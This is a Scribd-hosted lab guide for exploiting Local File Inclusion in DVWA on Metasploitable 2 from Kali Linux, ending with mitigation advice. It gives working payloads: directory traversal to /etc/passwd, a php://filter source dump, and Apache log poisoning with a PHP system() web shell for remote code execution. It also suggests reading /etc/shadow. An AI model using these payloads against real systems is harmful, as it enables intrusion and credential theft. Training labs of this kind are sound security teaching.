Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
173 views4 pages

Lab Instructions: Local File Inclusion (LFI) Attack Using Metasploitable and Kali Linux

Uploaded by

k.k.deenadhayalan1410
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
173 views4 pages

Lab Instructions: Local File Inclusion (LFI) Attack Using Metasploitable and Kali Linux

Uploaded by

k.k.deenadhayalan1410
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 4

Lab Instructions: Local File Inclusion (LFI) Attack using Metasploitable and

Kali Linux

In this lab, we will perform a Local File Inclusion (LFI) attack on a vulnerable web
application running on Metasploitable 2 using Kali Linux. LFI vulnerabilities allow
attackers to include and read files from the local server, often leading to the exposure of
sensitive information or execution of code under certain conditions.

Prerequisites

1. Kali Linux machine (Attacker)


2. Metasploitable 2 machine (Target)
3. Basic understanding of web exploitation techniques.

Step-by-Step Lab Guide

Step 1: Setup the Lab Environment

1. Start Kali Linux and Metasploitable 2:


o Ensure both machines are running and connected to the same network. You
can use Bridged Networking or NAT mode in VirtualBox or VMware.
2. Get the IP Address of Metasploitable 2:
o Log in to Metasploitable 2 (username: msfadmin, password: msfadmin).
o Run the following command to obtain its IP address:

bash
Copy code
ifconfig

o Note down the IP address (e.g., 192.168.1.105).


3. Verify Network Connectivity:
o From Kali Linux, verify that you can ping Metasploitable 2:

bash
Copy code
ping <Metasploitable_IP>

Example:

bash
Copy code
ping 192.168.1.105

Step 2: Identify the Vulnerable Web Application

1. Visit the Vulnerable Web App:


o Open a web browser in Kali Linux and navigate to Metasploitable’s web
application:
bash
Copy code
http://<Metasploitable_IP>

Example:

bash
Copy code
http://192.168.1.105

2. Navigate to DVWA (Damn Vulnerable Web Application):


o On the Metasploitable 2 home page, find and click on DVWA (Damn
Vulnerable Web Application).
3. Log into DVWA:
o Use the default credentials:

makefile
Copy code
Username: admin
Password: password

4. Set the DVWA Security Level:


o In DVWA, go to the DVWA Security tab.
o Set the Security Level to low for easier exploitation.

Step 3: Exploit the Local File Inclusion (LFI) Vulnerability

1. Go to the LFI Vulnerability Page:


o In DVWA, click on the File Inclusion section under Vulnerabilities in the
left-hand sidebar.
2. Test for Local File Inclusion:
o In the URL, you will see something like:

ruby
Copy code
http://192.168.1.105/dvwa/vulnerabilities/fi/?page=include.php

o Modify the page parameter to try and include the /etc/passwd file, a
common target in LFI attacks:

ruby
Copy code
http://192.168.1.105/dvwa/vulnerabilities/fi/?
page=../../../../../../etc/passwd

Explanation: The ../ sequence is used to traverse back to the root directory
and access the /etc/passwd file.

3. Observe the Results:


o If successful, the contents of the /etc/passwd file will be displayed. This file
contains information about the users on the system:
ruby
Copy code
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

Step 4: Further Exploitation

1. Explore Other System Files:


o You can attempt to include other sensitive files such as:
 /etc/shadow (password hashes, may require root privileges)
 /var/log/auth.log (authentication logs)
2. Using PHP Wrappers:
o You can exploit certain LFI vulnerabilities using PHP wrappers to inject code.
Test using the PHP filter wrapper to display the contents of a PHP file, such
as index.php in base64 encoding:

ruby
Copy code
http://192.168.1.105/dvwa/vulnerabilities/fi/?page=php://
filter/convert.base64-encode/resource=index.php

o This will encode the contents of index.php in base64, which you can decode
to view the source code.

Step 5: Gaining Remote Code Execution

1. Create a Malicious PHP File:


o On the vulnerable Metasploitable web application, check if you can write to
log files (such as /var/log/apache2/access.log), which could allow for
remote code execution.
2. Log Injection for RCE:
o Inject a PHP code snippet into the log file by visiting a URL that contains the
PHP payload:

php
Copy code
http://192.168.1.105/dvwa/vulnerabilities/fi/?page=<?php
system($_GET['cmd']); ?>

o This may get written into the log file.


3. Trigger RCE via LFI:
o Try to include the log file that now contains the injected PHP code:

bash
Copy code
http://192.168.1.105/dvwa/vulnerabilities/fi/?page=/var/log/
apache2/access.log&cmd=id
o If successful, the id command will execute, and you will see the output of the
command on the screen.

Step 6: Clean Up

1. Stop Metasploitable 2 after the lab to avoid keeping vulnerable services exposed.
2. Delete any malicious code injected into the log files or other files during the lab.

Conclusion

In this lab, you successfully exploited a Local File Inclusion (LFI) vulnerability, gaining
access to sensitive system files and even obtaining remote code execution (RCE) by injecting
malicious PHP code into a log file. LFI is a serious web vulnerability that occurs when user-
controlled input is used in file paths without proper validation and sanitization.

Mitigation

To protect against LFI vulnerabilities:

1. Validate and sanitize user input to prevent directory traversal.


2. Disable dangerous PHP functions such as include, require, and
allow_url_include if not needed.
3. Use whitelists for file paths to restrict file access.
4. Keep web applications and servers updated with the latest security patches.

You might also like